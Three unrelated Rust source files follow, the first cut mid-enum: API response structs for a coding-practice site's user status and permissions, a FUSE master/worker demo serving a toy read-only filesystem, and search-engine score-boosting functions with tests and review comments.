#[serde(rename = "authentication_ignore_beta_user_flow")]
AuthenticationIgnoreBetaUserFlow,
#[serde(rename = "authentication_see_user_email")]
AuthenticationSeeUserEmail,
#[serde(rename = "authentication_see_user_id")]
AuthenticationSeeUserId,
#[serde(rename = "columns_add_article")]
ColumnsAddArticle,
#[serde(rename = "columns_change_article")]
ColumnsChangeArticle,
#[serde(rename = "columns_delete_article")]
ColumnsDeleteArticle,
#[serde(rename = "columns_pick_article")]
ColumnsPickArticle,
#[serde(rename = "columns_review_article")]
ColumnsReviewArticle,
#[serde(rename = "columns_see_columns")]
ColumnsSeeColumns,
#[serde(rename = "contest_private_access_dashboard")]
ContestPrivateAccessDashboard,
#[serde(rename = "contest_see_private")]
ContestSeePrivate,
#[serde(rename = "discuss_change_contest_post")]
DiscussChangeContestPost,
#[serde(rename = "discuss_change_post")]
DiscussChangePost,
#[serde(rename = "discuss_delete_contest_post")]
DiscussDeleteContestPost,
#[serde(rename = "discuss_delete_post")]
DiscussDeletePost,
#[serde(rename = "discuss_pin_contest_topic")]
DiscussPinContestTopic,
#[serde(rename = "discuss_pin_topic")]
DiscussPinTopic,
#[serde(rename = "discuss_review_contest_post")]
DiscussReviewContestPost,
#[serde(rename = "discuss_review_post")]
DiscussReviewPost,
// NOTE(review): "hiden" below matches the upstream wire spelling — do not
// "fix" these strings or deserialization will break.
#[serde(rename = "discuss_see_contest_hiden_post")]
DiscussSeeContestHidenPost,
#[serde(rename = "discuss_see_hiden_post")]
DiscussSeeHidenPost,
#[serde(rename = "library_change_question")]
LibraryChangeQuestion,
#[serde(rename = "library_see_all_fields")]
LibrarySeeAllFields,
#[serde(rename = "library_see_all_problems")]
LibrarySeeAllProblems,
}
/// Top-level API response wrapper: `{ "data": ... }`.
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub struct Response {
data: GlobalResp,
}
/// Current user's account/session flags, deserialized from the camelCase
/// JSON payload. Only the `pub` booleans are exposed to JS via wasm_bindgen.
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub struct UserStatus {
#[serde(rename = "__typename")]
typename: UserStatusTypename,
#[serde(rename = "activeSessionId")]
active_session_id: String,
#[serde(rename = "avatar")]
avatar: String,
#[serde(rename = "checkedInToday")]
pub checked_in_today: bool,
#[serde(rename = "completedFeatureGuides")]
completed_feature_guides: Vec<FeatureGuideType>,
#[serde(rename = "isAdmin")]
pub is_admin: bool,
#[serde(rename = "isPremium")]
pub is_premium: bool,
#[serde(rename = "isSignedIn")]
pub is_signed_in: bool,
#[serde(rename = "isStaff")]
pub is_staff: bool,
#[serde(rename = "isSuperuser")]
pub is_superuser: bool,
#[serde(rename = "isTranslator")]
pub is_translator: bool,
#[serde(rename = "isVerified")]
pub is_verified: bool,
#[serde(rename = "notificationStatus")]
notification_status: FluffyNotificationStatus,
#[serde(rename = "optedIn")]
pub opted_in: bool,
#[serde(rename = "permissions")]
permissions: Vec<Permission>,
#[serde(rename = "realName")]
real_name: String,
#[serde(rename = "region")]
region: String,
#[serde(rename = "requestRegion")]
request_region: String,
#[serde(rename = "username")]
username: String,
#[serde(rename = "userSlug")]
user_slug: String,
}
/// Notification counters for the current user.
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub struct FluffyNotificationStatus {
#[serde(rename = "__typename")]
typename: NotificationStatusTypename,
#[serde(rename = "lastModified")]
last_modified: String,
#[serde(rename = "numUnread")]
pub num_unread: f64,
}
/// Payload under `"data"`: user status plus site feature flags.
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub struct GlobalResp {
#[serde(rename = "userStatus")]
user_status: UserStatus,
feature: Feature,
}
/// Site feature flags as delivered by the API.
#[wasm_bindgen]
#[derive(Serialize, Deserialize)]
pub struct Feature {
#[serde(rename = "__typename")]
typename: FeatureTypename,
#[serde(rename = "book")]
pub book: bool,
#[serde(rename = "chinaProblemDiscuss")]
pub china_problem_discuss: bool,
#[serde(rename = "cnJobs")]
pub cn_jobs: bool,
#[serde(rename = "contest")]
pub contest: bool,
#[serde(rename = "discuss")]
pub discuss: bool,
#[serde(rename = "mockInterview")]
pub mock_interview: bool,
#[serde(rename = "questionTranslation")]
pub question_translation: bool,
#[serde(rename = "signUp")]
pub sign_up: bool,
#[serde(rename = "socialProviders")]
social_providers: String,
#[serde(rename = "store")]
pub store: bool,
#[serde(rename = "studentFooter")]
pub student_footer: bool,
#[serde(rename = "subscription")]
pub subscription: bool,
}
/// Returns the contained value, aborting the process on `None`.
/// Aborting (rather than panicking) avoids pulling unwinding machinery into
/// the wasm binary.
#[inline]
fn unwrap_abort<T>(o: Option<T>) -> T {
    o.unwrap_or_else(|| std::process::abort())
}
/// Returns the `Ok` value, aborting the process on `Err`.
/// Aborting (rather than panicking) avoids pulling unwinding machinery into
/// the wasm binary.
#[inline]
fn unwrap_result_abort<T, E: Debug>(o: Result<T, E>) -> T {
    if let Ok(value) = o {
        value
    } else {
        std::process::abort()
    }
}
/// Deserializes a JSON byte buffer (handed over from JS) into a `Response`,
/// aborting the process on malformed input.
#[wasm_bindgen]
pub fn parse(v: Box<[u8]>) -> Response {
unwrap_result_abort(from_slice(v.as_ref()))
}
/// Serializes a `Response` back to a JSON string, aborting on failure.
#[wasm_bindgen]
pub fn stringify(v: &Response) -> String {
unwrap_result_abort(to_string(v))
}
|
use std::str::FromStr;
use structopt::StructOpt;
use std::io;
use std::env;
use std::process::Command;
use log::*;
use std::thread::sleep;
use std::time::Duration;
use std::fs::File;
use std::os::raw::c_int;
use std::path::Path;
use std::sync::Arc;
use flexi_logger::{colored_opt_format, Logger};
use std::os::unix::io::{RawFd, FromRawFd, AsRawFd};
use rofuse::MountOption;
use rofuse::{channel::Channel, mnt::Mount, Session};
/// Entry point: parses CLI options, initializes trace-level logging, then
/// dispatches to the master or worker role.
fn main() {
let opt: Options = Options::from_args();
Logger::try_with_env_or_str("trace")
.unwrap()
.format(colored_opt_format)
.start().unwrap();
log::set_max_level(LevelFilter::Trace);
debug!("{:?}", opt);
match opt.role {
Role::Master => master(opt),
Role::Worker => worker(opt),
}.unwrap()
}
/// Master role: mounts the read-only FUSE filesystem, then supervises a
/// worker child process, restarting it whenever it exits. Never returns
/// (the respawn loop diverges); `mount` must stay alive for the mount to
/// persist.
fn master(opt: Options) -> io::Result<()> {
    let options = vec![
        MountOption::RO,
        MountOption::FSName("rofs".to_string()),
        MountOption::Subtype("FUSE".to_string()),
        MountOption::Async,
        MountOption::DirSync,
        MountOption::AutoUnmount,
    ];
    let (file, mount): (Arc<File>, Mount) = Mount::new(opt.mountpoint.as_ref(), &options)?;
    let fd = file.as_ref().as_raw_fd() as i32;
    // The worker runs with the same options, except role/session are
    // overridden so it can take over the mounted session fd.
    let mut child_opt = opt.clone();
    child_opt.role = Role::Worker;
    child_opt.session = fd;
    let current_dir = env::current_dir().unwrap().to_str().unwrap().to_string();
    // argv[0]: re-exec ourselves as the worker binary.
    let current_cmd = env::args().next().unwrap();
    info!("{}/{}", current_dir, current_cmd);
    loop {
        let mut cmd = Command::new(format!("{}/{}", current_dir, current_cmd));
        cmd.args(child_opt.to_args());
        let mut res = cmd.spawn().expect("worker failed");
        match res.wait() {
            Ok(s) => println!("{}", s),
            Err(e) => println!("{}", e),
        }
    }
}
/// Worker role: takes over the FUSE session fd inherited from the master,
/// rebuilds the channel/session around it and serves the filesystem.
fn worker(opt: Options) -> io::Result<()> {
unsafe {
// NOTE(review): hand-assembled ioctl request number on the session fd;
// the intended request (presumably a FUSE device ioctl) is not
// derivable from here — confirm and name the constant.
let res = libc::ioctl(opt.session as c_int, (2 << 30) | (4 << 16) | (230 << 8) as u64, 0);
info!("ioctl {} {} {}", opt.session as c_int, (2 << 30) | (4 << 16) | (230 << 8) as u64, 0);
info!("res {}", res);
};
// SAFETY-NOTE(review): `from_raw_fd` assumes `opt.session` is a valid fd
// owned by this process (handed over by the master) — confirm.
let zerofs = unsafe{mufs::zero("file".to_string())?};
let file = unsafe {File::from_raw_fd(opt.session as RawFd)};
let ch = Channel::new(Arc::new(file));
Session::restore(zerofs, opt.mountpoint.parse().unwrap(), ch).run();
return Ok(())
}
// CLI options; the master clones these (with role/session overridden) and
// re-serializes them via `to_args` when spawning the worker. Plain `//`
// comments are used on purpose: structopt turns `///` doc comments into
// help text.
#[derive(StructOpt, Debug, Clone)]
#[structopt(
name = format!("test"),
)]
pub struct Options {
// NOTE(review): default_value "single" is not parseable by Role::from_str
// ("master"/"worker" only); combined with `required = true` the default
// should never be used — confirm the intended behavior.
#[structopt(
short = "r",
long = "role",
required = true,
help = "role of master/worker",
default_value = "single"
)]
pub role: Role,
// Fd of the mounted FUSE session; -1 means "not inherited" (master role).
#[structopt(
short = "s",
long = "session-fd",
required = false,
help = "fd of fuse session",
default_value = "-1"
)]
pub session: i32,
#[structopt(
short = "p",
long = "mountpoint",
required = true,
help = "mount point",
)]
pub mountpoint: String,
}
impl Options {
    /// Serializes these options back into argv form for spawning a worker
    /// child process.
    fn to_args(&self) -> Vec<String> {
        vec![
            "--role".to_string(),
            self.role.to_string(),
            "--session-fd".to_string(),
            self.session.to_string(),
            "--mountpoint".to_string(),
            self.mountpoint.to_string(),
        ]
    }
}
/// Process role selected on the command line ("master" / "worker").
#[derive(Debug, PartialEq, Eq, Copy, Clone)]
pub enum Role {
Master,
Worker,
}
impl FromStr for Role {
    type Err = String;

    /// Parses "master" / "worker"; any other input is an error.
    fn from_str(role: &str) -> Result<Role, Self::Err> {
        match role {
            "master" => Ok(Role::Master),
            "worker" => Ok(Role::Worker),
            other => Err(format!("bad role {}", other)),
        }
    }
}
impl ToString for Role {
    /// Canonical CLI spelling; inverse of `FromStr`.
    /// (Replaces the previous `&str -> parse::<String>() -> unwrap` detour
    /// with a direct conversion.)
    fn to_string(&self) -> String {
        match self {
            Role::Master => "master",
            Role::Worker => "worker",
        }
        .to_string()
    }
}
/// Toy read-only FUSE filesystem exposing `hello.txt`, `fast.txt` and
/// `slow.txt`; the latter two artificially delay reads to emulate slow I/O.
pub mod mufs {
use std::cmp::{max, min};
// NOTE(review): several imports here (clap, memmap, max/min, Error, Read,
// Seek, File, FileExt, MountOption, crate_version, ...) appear unused in
// this module — candidates for cleanup.
use clap::{crate_version, App, Arg};
use rofuse::{
FileAttr, FileType, Filesystem, MountOption, ReplyAttr, ReplyData, ReplyDirectory, ReplyEntry,
Request,
};
use memmap::{Mmap, MmapOptions};
use libc::ENOENT;
use std::ffi::OsStr;
use std::time::{Duration, UNIX_EPOCH};
use std::io::{Result, Error, Read, Seek};
use std::fs::File;
use std::os::unix::fs::FileExt;
// 4 MiB; currently unused in this module.
const MAX: i32 = 4 * 1024 *1024;
// How long the kernel may cache entries/attributes.
const TTL: Duration = Duration::from_secs(1); // 1 second
// Static file contents served by the filesystem.
const HELLO_TXT_CONTENT: &str = "Hello World!\n";
const FAST_CONTENT: &str = "fast\n";
const SLOW_CONTENT: &str = "slow\n";
// Fixed attributes for inodes 1-4: root directory, hello.txt, fast.txt and
// slow.txt (the `size` fields match the content constants above).
static ATTRS: [FileAttr; 4] = [
FileAttr {
ino: 1,
size: 0,
blocks: 0,
atime: UNIX_EPOCH, // 1970-01-01 00:00:00
mtime: UNIX_EPOCH,
ctime: UNIX_EPOCH,
crtime: UNIX_EPOCH,
kind: FileType::Directory,
perm: 0o755,
nlink: 2,
uid: 501,
gid: 20,
rdev: 0,
flags: 0,
blksize: 512,
}, FileAttr {
ino: 2,
size: 13,
blocks: 1,
atime: UNIX_EPOCH, // 1970-01-01 00:00:00
mtime: UNIX_EPOCH,
ctime: UNIX_EPOCH,
crtime: UNIX_EPOCH,
kind: FileType::RegularFile,
perm: 0o644,
nlink: 1,
uid: 501,
gid: 20,
rdev: 0,
flags: 0,
blksize: 512,
}, FileAttr {
ino: 3,
size: 5,
blocks: 1,
atime: UNIX_EPOCH, // 1970-01-01 00:00:00
mtime: UNIX_EPOCH,
ctime: UNIX_EPOCH,
crtime: UNIX_EPOCH,
kind: FileType::RegularFile,
perm: 0o644,
nlink: 1,
uid: 501,
gid: 20,
rdev: 0,
flags: 0,
blksize: 512,
}, FileAttr {
ino: 4,
size: 5,
blocks: 1,
atime: UNIX_EPOCH, // 1970-01-01 00:00:00
mtime: UNIX_EPOCH,
ctime: UNIX_EPOCH,
crtime: UNIX_EPOCH,
kind: FileType::RegularFile,
perm: 0o644,
nlink: 1,
uid: 501,
gid: 20,
rdev: 0,
flags: 0,
blksize: 512,
}
];
/// In-memory filesystem state: a copy of the static attribute table.
pub struct Zero {
attrs: Vec<FileAttr>,
}
/// Builds the in-memory filesystem state.
///
/// # Safety
/// Declared `unsafe` for its caller in `worker`; the body performs no
/// unsafe operations today. NOTE(review): the `name` parameter and the
/// `mut` on `attrs` are unused.
pub unsafe fn zero(name: String) -> Result<Zero> {
let mut attrs = Vec::from(ATTRS);
return Ok(Zero{
attrs: attrs,
})
}
impl Filesystem for Zero {
/// Resolves a name in the root directory (parent inode 1) to its
/// inode's attributes; ENOENT otherwise.
fn lookup(&mut self, _req: &Request, parent: u64, name: &OsStr, reply: ReplyEntry) {
if parent == 1 {
match name.to_str().unwrap() {
"hello.txt" => reply.entry(&TTL, &self.attrs[1], 0),
"fast.txt" => reply.entry(&TTL, &self.attrs[2], 0),
"slow.txt" => reply.entry(&TTL, &self.attrs[3], 0),
_ => {reply.error(ENOENT)}
}
} else {
reply.error(ENOENT);
}
}
/// Returns attributes for inodes 1-4; ENOENT otherwise.
fn getattr(&mut self, _req: &Request, ino: u64, reply: ReplyAttr) {
match ino {
1 | 2 | 3 | 4 => reply.attr(&TTL, &self.attrs[(ino - 1) as usize]),
_ => reply.error(ENOENT),
}
}
/// Lists the root directory starting at `offset`.
/// NOTE(review): `all` keeps adding entries while `reply.add` returns
/// true — confirm this matches rofuse's "buffer full" return convention.
fn readdir(
&mut self,
_req: &Request,
ino: u64,
_fh: u64,
offset: i64,
mut reply: ReplyDirectory,
) {
match ino {
1 => {
vec![
(1, FileType::Directory, "."),
(1, FileType::Directory, ".."),
(2, FileType::RegularFile, "hello.txt"),
(3, FileType::RegularFile, "fast.txt"),
(4, FileType::RegularFile, "slow.txt"),
]
.iter()
.enumerate()
.skip(offset as usize)
.all(|(index, entry)| reply.add(entry.0, (index + 1) as i64, entry.1, entry.2));
reply.ok();
}
_ => reply.error(ENOENT),
}
}
/// Serves file contents from `offset`; fast.txt sleeps 1s and slow.txt
/// sleeps 10s to simulate slow reads.
/// NOTE(review): slicing with `offset` panics if it exceeds the content
/// length — confirm the kernel never reads past EOF here.
fn read(
&mut self,
_req: &Request,
ino: u64,
_fh: u64,
offset: i64,
_size: u32,
_flags: i32,
_lock: Option<u64>,
reply: ReplyData,
) {
match ino {
2 => reply.data(&HELLO_TXT_CONTENT.as_bytes()[offset as usize..]),
3 => {std::thread::sleep(Duration::from_secs(1)); reply.data(&FAST_CONTENT.as_bytes()[offset as usize..])},
4 => {std::thread::sleep(Duration::from_secs(10)); reply.data(&SLOW_CONTENT.as_bytes()[offset as usize..])},
_ => reply.error(ENOENT),
}
}
}
}
|
use super::*;
use crate::{search::request::*, steps::FieldPath};
pub use self::result::*;
use std::{self, f32};
use fnv::FnvHashMap;
use itertools::Itertools;
/// Computes text-locality boosts for every field in `term_id_hits_in_field`
/// (in parallel), merges the per-field hits by anchor id and keeps one score
/// per anchor.
#[inline]
pub(crate) fn boost_text_locality_all(persistence: &Persistence, term_id_hits_in_field: &mut FnvHashMap<String, FnvHashMap<String, Vec<TermId>>>) -> Result<Vec<Hit>, VelociError> {
debug!("boost_text_locality_all {:?}", term_id_hits_in_field);
info_time!("boost_text_locality_all");
let mut boost_anchor: Vec<Hit> = vec![];
let r: Result<Vec<_>, VelociError> = term_id_hits_in_field
.into_par_iter()
.map(|(path, term_with_ids)| boost_text_locality(persistence, path, term_with_ids))
.collect();
info_time!("collect sort_boost");
let boosts = r?;
// Each per-field Vec<Hit> is sorted by id (see boost_text_locality), so a
// k-way merge + group_by folds duplicate anchor ids together.
let mergo = boosts.into_iter().kmerge_by(|a, b| a.id < b.id);
for (id, group) in &mergo.group_by(|el| el.id) {
// NOTE(review): the comparator swaps its arguments (b vs a), so this
// `max_by` actually selects the SMALLEST score of the group — confirm
// whether min or max was intended.
let best_score = group.map(|el| el.score).max_by(|a, b| b.partial_cmp(a).unwrap_or(Ordering::Equal)).unwrap();
debug_assert!(!best_score.is_nan());
debug_assert!(best_score != std::f32::INFINITY);
boost_anchor.push(Hit::new(id, best_score));
}
trace!("{:?}", boost_anchor);
Ok(boost_anchor)
}
/// Boosts documents in which several distinct search terms hit the same text
/// (term locality) for a single field `path`. The boost per text is
/// `2 * n^2` where `n` is the number of term hits in that text. Returns
/// anchor hits sorted by id.
pub(crate) fn boost_text_locality(persistence: &Persistence, path: &str, search_term_to_text_ids: &mut FnvHashMap<String, Vec<TermId>>) -> Result<Vec<Hit>, VelociError> {
let mut boost_anchor = vec![];
if search_term_to_text_ids.len() <= 1 {
// No boost for single term hits
return Ok(vec![]);
}
let token_to_text_id = persistence.get_valueid_to_parent(path.add(TOKENS_TO_TEXT_ID))?;
let mut terms_text_ids: Vec<_> = vec![];
let mut boost_text_ids = vec![];
{
trace_time!("text_locality_boost get and group text_ids");
// Map each term's token ids to text ids; keep one sorted list per term.
for text_ids in search_term_to_text_ids.values() {
let mut text_ids = get_all_value_ids(text_ids, token_to_text_id);
text_ids.sort_unstable();
terms_text_ids.push(text_ids);
}
// Merge all per-term lists; a text id appearing more than once means
// multiple terms hit the same text.
let mergo = terms_text_ids.into_iter().kmerge_by(|a, b| a < b);
for (id, group) in &mergo.group_by(|el| *el) {
let num_hits_in_same_text = group.count();
if num_hits_in_same_text > 1 {
boost_text_ids.push((id, num_hits_in_same_text));
}
}
}
// text_ids are already anchor_ids === identity_column
if persistence
.metadata
.columns
.get(&extract_field_name(path))
.map(|el| el.is_anchor_identity_column)
.unwrap_or(false)
{
boost_text_ids.sort_unstable_by_key(|el| el.0);
for text_id in boost_text_ids {
let num_hits_in_same_text = text_id.1;
boost_anchor.push(Hit::new(text_id.0, 2. * num_hits_in_same_text as f32 * num_hits_in_same_text as f32));
}
} else {
// Otherwise resolve each boosted text id to its anchor id(s) first.
let text_id_to_anchor = persistence.get_valueid_to_parent(path.add(TEXT_ID_TO_ANCHOR))?;
trace_time!("text_locality_boost text_ids to anchor");
boost_text_ids.sort_unstable_by_key(|el| el.0);
for text_id in boost_text_ids {
let num_hits_in_same_text = text_id.1;
for anchor_id in text_id_to_anchor.get_values_iter(u64::from(text_id.0)) {
boost_anchor.push(Hit::new(anchor_id, 2. * num_hits_in_same_text as f32 * num_hits_in_same_text as f32));
}
}
}
boost_anchor.sort_unstable_by_key(|el| el.id);
Ok(boost_anchor)
}
/// Applies term boosts to `res`: first consults the shared term-boost cache;
/// on a miss, resolves the boost hits for every term (in parallel), applies
/// them and stores them in the cache. (A large block of commented-out
/// benchmarking experiments was removed here.)
pub(crate) fn apply_boost_term(persistence: &Persistence, mut res: SearchFieldResult, boost_term: &[RequestSearchPart]) -> Result<SearchFieldResult, VelociError> {
info_time!("boost_term");
{
persistence.term_boost_cache.write().get(boost_term); // poke: refresh the entry's LRU position
}
let mut from_cache = false;
// The read lock would otherwise stay alive for the rest of the function;
// keep it in its own scope so the later `write()` cannot deadlock.
{
if let Some(data) = persistence.term_boost_cache.read().peek(boost_term) {
info_time!("boost_term_from_cache");
// Turn each cached result's hit ids into constant-score boost hits
// (default boost factor 2.0) and k-way-merge them sorted by id.
let mut boost_iter = data
.iter()
.map(|el| {
let boost_val: f32 = el.request.boost.map(|el| el.into_inner()).unwrap_or(2.0);
debug_assert!(!boost_val.is_nan());
debug_assert!(boost_val != std::f32::INFINITY);
el.hits_ids.iter().map(move |id| Hit::new(*id, boost_val))
})
.kmerge_by(|a, b| a.id < b.id);
debug_time!("boost_hits_ids_vec_multi");
res = apply_boost_from_iter(res, &mut boost_iter);
from_cache = true;
}
}
if !from_cache {
// Cache miss: resolve term ids and anchors for every boost term in
// parallel, apply them, then populate the cache for next time.
let r: Result<Vec<_>, VelociError> = boost_term
.to_vec()
.into_par_iter()
.map(|boost_term_req: RequestSearchPart| {
let mut boost_term_req = PlanRequestSearchPart {
request: boost_term_req,
get_ids: true,
..Default::default()
};
let mut result = search_field::get_term_ids_in_field(persistence, &mut boost_term_req)?;
result = search_field::resolve_token_to_anchor(persistence, &boost_term_req.request, &None, &result)?;
Ok(result)
})
.collect();
let mut data = r?;
res = boost_hits_ids_vec_multi(res, &mut data);
{
persistence.term_boost_cache.write().insert(boost_term.to_vec(), data);
}
}
Ok(res)
}
/// Multiplies the scores of `results.hits_scores` (assumed sorted by id) by
/// every matching boost hit from the id-sorted `boost_iter`, collecting
/// explain entries when the request asks for them. A hit can be boosted
/// multiple times when the iterator yields its id repeatedly.
pub(crate) fn apply_boost_from_iter(mut results: SearchFieldResult, mut boost_iter: &mut dyn Iterator<Item = Hit>) -> SearchFieldResult {
let mut explain = FnvHashMap::default();
// Temporarily take the explain map out of `results` so the closure below
// can borrow it while `results.hits_scores` is iterated mutably.
mem::swap(&mut explain, &mut results.explain);
let should_explain = results.request.is_explain();
{
// Advance the boost iterator past/onto `hit.id`, applying every boost
// whose id matches; the first boost beyond `hit.id` is kept in
// `hit_curr` for the next result hit.
let mut move_boost = |hit: &mut Hit, hit_curr: &mut Hit, boost_iter: &mut dyn Iterator<Item = Hit>| {
//Forward the boost iterator and look for matches
for b_hit in boost_iter {
if b_hit.id > hit.id {
*hit_curr = b_hit;
break;
} else if b_hit.id == hit.id {
*hit_curr = b_hit.clone();
hit.score *= b_hit.score;
debug_assert!(!hit.score.is_nan());
debug_assert!(hit.score != std::f32::INFINITY);
if should_explain {
let data = explain.entry(hit.id).or_insert_with(Vec::new);
data.push(Explain::Boost(b_hit.score));
}
}
}
};
if let Some(yep) = boost_iter.next() {
let mut hit_curr = yep;
for mut hit in &mut results.hits_scores {
if hit_curr.id < hit.id {
move_boost(hit, &mut hit_curr, &mut boost_iter);
} else if hit_curr.id == hit.id {
hit.score *= hit_curr.score;
move_boost(hit, &mut hit_curr, &mut boost_iter); // Possible multi boosts [id:0->2, id:0->4 ...]
}
}
}
}
// Put the (possibly updated) explain map back.
mem::swap(&mut explain, &mut results.explain);
results
}
/// NOTE(review): despite its name this test exercises
/// `apply_boost_values_anchor` (with Multiply): ids 1 and 5 are boosted,
/// ids 2/6 have no matching hit, id 3 has no boost.
#[test]
fn test_apply_boost_from_iter() {
let boost_req = RequestBoostPart {
boost_fun: Some(BoostFunction::Multiply),
..Default::default()
};
let mut res = SearchFieldResult::default();
res.hits_scores = vec![Hit::new(1, 10.0), Hit::new(3, 20.0), Hit::new(5, 20.0)];
let mut boost_values = SearchFieldResult::default();
boost_values.boost_ids = vec![Hit::new(1, 2.0), Hit::new(2, 20.0), Hit::new(5, 3.0), Hit::new(6, 3.0)];
apply_boost_values_anchor(&mut res, &boost_req, &mut boost_values.boost_ids.into_iter()).unwrap();
assert_eq!(res.hits_scores, vec![Hit::new(1, 20.0), Hit::new(3, 20.0), Hit::new(5, 60.0)]);
}
/// Applies boost values from the id-sorted `boost_iter` to the id-sorted
/// `results.hits_scores`, delegating the actual score math to `apply_boost`
/// with the function/params from `boost`.
pub(crate) fn apply_boost_values_anchor(results: &mut SearchFieldResult, boost: &RequestBoostPart, mut boost_iter: &mut dyn Iterator<Item = Hit>) -> Result<(), VelociError> {
let boost_param = boost.param.map(|el| el.into_inner()).unwrap_or(0.0);
let expre = boost.expression.as_ref().map(|expression| ScoreExpression::new(expression.clone()));
let mut explain = if results.request.is_explain() { Some(&mut results.explain) } else { None };
{
if let Some(yep) = boost_iter.next() {
let mut hit_curr = yep;
for hit in &mut results.hits_scores {
if hit_curr.id < hit.id {
// Advance the boost iterator up to (and through) hit.id,
// applying every boost that matches.
for b_hit in &mut boost_iter {
if b_hit.id > hit.id {
hit_curr = b_hit.clone();
break;
} else if b_hit.id == hit.id {
hit_curr = b_hit.clone();
apply_boost(hit, b_hit.score, boost_param, &boost.boost_fun, &mut explain, &expre)?;
}
}
} else if hit_curr.id == hit.id {
apply_boost(hit, hit_curr.score, boost_param, &boost.boost_fun, &mut explain, &expre)?;
}
}
}
}
Ok(())
}
/// Applies one boost value to a single hit according to `boost_fun`:
/// Log10/Log2 multiply the score by log(boost_value + boost_param),
/// Multiply/Add combine the sum directly, Replace overwrites the score.
/// An optional `ScoreExpression` result is then ADDED on top, and explain
/// entries are recorded when `explain` is present.
/// NOTE(review): only the Log10 arm records a pre-application explain entry;
/// the other arms rely solely on the final entry at the bottom — confirm
/// whether this asymmetry is intended.
pub(crate) fn apply_boost(
hit: &mut Hit,
boost_value: f32,
boost_param: f32,
boost_fun: &Option<BoostFunction>,
explain: &mut Option<&mut FnvHashMap<u32, Vec<Explain>>>,
expre: &Option<ScoreExpression>,
) -> Result<(), VelociError> {
match boost_fun {
Some(BoostFunction::Log10) => {
if let Some(explain) = explain {
let entry = explain.entry(hit.id).or_insert_with(Vec::new);
entry.push(Explain::Boost((boost_value + boost_param).log10()));
}
trace!(
"Log10 boosting hit.id {:?} score {:?} to {:?} -- token_value {:?} boost_value {:?}",
hit.id,
hit.score,
hit.score * (boost_value + boost_param).log10(),
boost_value,
(boost_value + boost_param).log10(),
);
hit.score *= (boost_value + boost_param).log10();
}
Some(BoostFunction::Log2) => {
trace!(
"Log2 boosting hit.id {:?} hit.score {:?} to {:?} -- token_value {:?} boost_value {:?}",
hit.id,
hit.score,
hit.score * (boost_value + boost_param).log2(),
boost_value,
(boost_value + boost_param).log2(),
);
hit.score *= (boost_value + boost_param).log2();
}
Some(BoostFunction::Multiply) => {
trace!(
"Multiply boosting hit.id {:?} hit.score {:?} to {:?} -- token_value {:?} boost_value {:?}",
hit.id,
hit.score,
hit.score * (boost_value + boost_param),
boost_value,
(boost_value + boost_param)
);
hit.score *= boost_value + boost_param;
}
Some(BoostFunction::Add) => {
trace!(
"boosting hit.id {:?} hit.score {:?} to {:?} -- token_value {:?} boost_value {:?}",
hit.id,
hit.score,
hit.score + (boost_value + boost_param),
boost_value,
(boost_value + boost_param)
);
hit.score += boost_value + boost_param;
}
Some(BoostFunction::Replace) => {
trace!(
"replace hit.id {:?} hit.score {:?} to {:?} -- token_value {:?} boost_value {:?}",
hit.id,
hit.score,
(boost_value + boost_param),
boost_value,
(boost_value + boost_param)
);
hit.score = boost_value + boost_param;
}
None => {}
}
if let Some(exp) = expre.as_ref() {
let prev_score = hit.score;
hit.score += exp.get_score(boost_value);
trace!(
"boost {:?} to {:?} with boost_fun({:?})={:?}",
prev_score,
hit.score,
boost_value,
exp.get_score(boost_value)
);
}
debug_assert!(!hit.score.is_nan());
debug_assert!(hit.score != std::f32::INFINITY);
if let Some(explain) = explain {
let data = explain.entry(hit.id).or_insert_with(Vec::new);
data.push(Explain::Boost(hit.score));
}
Ok(())
}
/// Applies the boost values from the boost parts to the result: sorts all
/// inputs by id, converts each boost part's `hits_ids` into constant-score
/// boost hits (default boost factor 2.0), k-way-merges them by id and
/// multiplies them into `results` via `apply_boost_from_iter`.
pub(crate) fn boost_hits_ids_vec_multi(mut results: SearchFieldResult, boost: &mut [SearchFieldResult]) -> SearchFieldResult {
{
debug_time!("boost hits sort input");
results.hits_scores.sort_unstable_by_key(|el| el.id); //TODO SORT NEEDED??
for res in boost.iter_mut() {
res.hits_scores.sort_unstable_by_key(|el| el.id);
res.hits_ids.sort_unstable();
}
}
let mut boost_iter = boost
.iter()
.map(|el| {
let boost_val: f32 = el.request.boost.map(|el| el.into_inner()).unwrap_or(2.0);
debug_assert!(!boost_val.is_nan());
debug_assert!(boost_val != std::f32::INFINITY);
el.hits_ids.iter().map(move |id| Hit::new(*id, boost_val))
})
.kmerge_by(|a, b| a.id < b.id);
debug_time!("boost_hits_ids_vec_multi");
apply_boost_from_iter(results, &mut boost_iter)
}
/// With the default boost factor 2.0, each occurrence of a hit's id in a
/// boost list doubles its score: id 0 once (40), id 10 three times (160),
/// id 60 once (40), id 5 never (unchanged).
#[test]
fn boost_intersect_hits_vec_test_multi() {
let hits1 = vec![Hit::new(10, 20.0), Hit::new(0, 20.0), Hit::new(5, 20.0), Hit::new(60, 20.0)]; // unsorted
let boost = vec![0, 3, 10, 10, 70];
let boost2 = vec![10, 60];
let mut boosts = vec![
SearchFieldResult {
hits_ids: boost,
..Default::default()
},
SearchFieldResult {
hits_ids: boost2,
..Default::default()
},
];
let res = boost_hits_ids_vec_multi(
SearchFieldResult {
hits_scores: hits1,
..Default::default()
},
&mut boosts,
);
assert_eq!(res.hits_scores, vec![Hit::new(0, 40.0), Hit::new(5, 20.0), Hit::new(10, 160.0), Hit::new(60, 40.0)]);
}
/// Reads the boost values for `hits.hits_ids` from the field's
/// BOOST_VALID_TO_VALUE store, then resolves each boosted value id to its
/// anchor id via VALUE_ID_TO_ANCHOR. On return `hits.hits_ids` is emptied
/// and the resolved (anchor_id, boost) pairs live in `hits.boost_ids`.
pub(crate) fn get_boost_ids_and_resolve_to_anchor(persistence: &Persistence, path: &mut FieldPath, hits: &mut SearchFieldResult) -> Result<(), VelociError> {
path.suffix = Some(BOOST_VALID_TO_VALUE);
let boostkv_store = persistence.get_boost(&path.as_string())?;
hits.hits_ids.sort_unstable();
for value_id in &mut hits.hits_ids {
let val_opt = boostkv_store.get_value(*value_id as u64);
if let Some(boost_value) = val_opt.as_ref() {
// Boost values are stored as the raw bit pattern of an f32.
let boost_value = f32::from_bits(*boost_value);
hits.boost_ids.push(Hit::new(*value_id, boost_value));
}
}
hits.hits_ids = vec![];
// resolve to anchor
let mut data = vec![];
path.suffix = Some(VALUE_ID_TO_ANCHOR);
